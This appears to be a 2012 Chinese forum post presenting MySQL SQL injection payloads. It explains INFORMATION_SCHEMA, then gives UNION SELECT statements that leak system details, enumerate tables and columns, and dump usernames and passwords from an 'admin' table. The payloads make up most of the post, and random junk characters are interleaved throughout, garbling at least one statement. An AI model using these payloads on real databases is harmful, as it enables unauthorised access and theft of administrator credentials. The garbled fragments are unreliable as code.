本文介绍MYSQL盲注的一些语句和方法# v% R% s( H* K# ?) R9 b8 s& {
. e7 Z# [6 p! r( d+ Y2 M
学习盲注前先了解下 IFORMATION_SCHEMA 库
' F/ @& E; q3 `& w& E) h2 q+ V4 M8 D* _3 Y
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有1 }) Q* a1 J1 y" f9 Z& P
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
: D/ u% v1 a0 U/ e3 J4 a5 h1.得到所有数据库名:5 @2 h3 u! V: ^1 Q/ ?( c- i: l9 E
|SCHEMATA ->存储数据库名的表
8 v6 R- _6 }7 L! x! j5 s) B|---字段:SCHEMA_NAME ->数据库名称
" S, ~' h5 T# ~6 X( B. z+ b& ^2 f' d+ f5 _6 }* M/ @
|TABLES ->存储表名! h+ K2 x- P; c3 y0 H# m
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名$ x: s# }& ]) ^" u. x8 Q
|---字段:TABLE_NAME ->存储表的表名
2 S1 h5 I4 c3 S1 ]8 _' ]" E+ K, B, L$ B
|COLUMNS ->存储的字段名表
9 ]0 u) s$ l" \% Y, G% D- P|---字段:TABLE_SCHEMA ->该字段所属数据库名
4 U$ s3 K5 J3 D( \4 z|---字段:TABLE_NAME ->存储所属表的名称% h4 R- q8 I% P. u7 U$ R) F
3 x! K9 }& u, L9 |) K2 d# s2 u1 }|---字段:COLUMN_NAME ->该字段的名称' b, |7 h1 u! C2 [$ w. N
9 i4 ^! B2 [ Q8 R
2 Z: ^1 |8 k! F; j9 j7 ^- t% F) i- M* k+ v d# L: T6 V' a
###########################################################################
3 q' Y7 k$ U# Y( S* X- V0 l' v+ v4 j9 a
0x001 获取系统信息:
, y( p8 @: O1 N$ h% Y2 ~5 _; Q( r' P `. t% ?4 B z+ [
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*) @) {* n& _, u4 ~
- y& T, A. Y2 f, B& y
/*2 |; e9 s8 b# Z( l- N0 j- U+ A
- }- M" B9 n7 s0 |8 Z3 S M) P@@global.version_compile_os 获取系统版本
8 e. Z& |7 n6 @( D9 J
0 E% ?8 s/ `+ \' e8 c7 C@@datadir 数据库路径
+ \+ i2 Z3 K( k/ \ H5 n' P1 ?0 h* Cdatabase() 当前数据库名称
# | D9 K- U; E9 p, T d: r8 n0x3c62723e 换行HEX值
6 t/ n0 o* o1 j3 V% K9 k5 F# C: P3 k4 h, `
*/
% g- _/ l9 j( o, Y6 O
; |9 u9 M' C' l, A; [ & M) J7 k# d+ d) r1 h. v
) p1 {- x$ ]9 |4 I2 r9 s% ]: V4 X######################################################################0 N+ T! Q5 R: f, w$ r, S
, t2 K- U f% y f1 y- g0 R0x002 获取表名
" q1 g _5 R3 B1 E
1 f1 D+ H7 |4 [1 Q9 Bunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
9 |% ^- ~7 \) b, ?4 C/ q) G& [; |3 \8 B ]* O5 P2 ^
4 I h& Z. G2 ?9 E! w/ Z
& M- O2 k6 u8 H o5 g, M; v O
/*7 J u+ m% l: O$ x0 W( Y
4 G- e6 V/ y0 n" n- p1 l7 e& F1 _ N0x67617264656e 为当前数据库名
: e% a R- U) S5 b: L) {- f
, o1 W5 N8 H b& F) r' J+ cgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
; l( q/ z) Q( H6 G% m* @% m( C# O8 W
*/
# ~* d& M4 I( W
8 b% ?5 T8 r. t# X$ r) m2 {; L######################################################################! S7 p5 s8 n4 v4 ?
- }, w' W4 v" a2 j) X 7 G6 x8 ]* \: h" U1 t+ k# G3 i
$ W9 q2 P0 z* L
0x003 获取字段
2 ]) x6 v; z2 ` R0 @& p: a0 m I4 I4 d
% v7 R# Y" D4 C; {1 D1 B! j0 Dunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
+ @2 t. J4 @2 ?8 r/ o: m
" v7 g o9 g b' }0 q" g9 o/*0 q3 }7 A; A! V+ w, h9 i
% O" O) _: R1 _0 n* Y5 _
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段/ n- h% i( p- H. h3 `' b5 X( x
. @2 U) A) r( i& r& T0 f. l0x61646d696e ->选择一个表+ [" W6 o& w9 _
% [: w7 |0 T4 M# }0x67617264656e ->数据库名8 t: s- K3 W* {
0 @: a. a5 W7 ^ e/ a9 t
*/
; k! p; \& D: z) E7 o: o0 f# q6 W! c2 k; e @7 t
#####################################################################
) T9 L4 D S7 X- S, ]
' z+ s4 V+ p2 v/ ]8 Q- ]
. Z! p: X4 Z! F$ Z! X5 n5 \/ o- j; W6 a k1 d$ u! y
0x004 获取数据, o) b" |, O- p- \9 R3 s7 b4 w
5 b: u8 h8 R4 M) w. zunion select 1,2,3& _" {% z& M/ \; B- y
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
5 [' F# _# P k+ J9 ]; T& X" }" d2 M( z2 ?6 ~2 Q1 v d$ f
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
& M K, f. T' f' b0 |9 ~: P# Q1 c J9 e0 @6 }7 P7 x0 j
; D- P1 v3 z+ q; O
& c* A9 W7 a9 P; C9 s
/*2 M; ]2 R# O/ P
. R2 `* J# H* ?0 Q; s0 q4 |8 z0x3c62723e 换行符号HEX编码
/ A! F2 j8 F. Y: E X- A3 ~0 O& `8 v# i D
group_concat 同时获得该字段所有数据2 M0 @1 j/ c* f8 \/ H8 H* ^
8 z3 U! l$ V6 O*/
. c- h5 f) f* Z8 z1 ^" B) ?7 C$ U2 J4 \8 G: C o2 w7 M
|
发表于 2012-9-13 17:48:44
收藏
支持
反对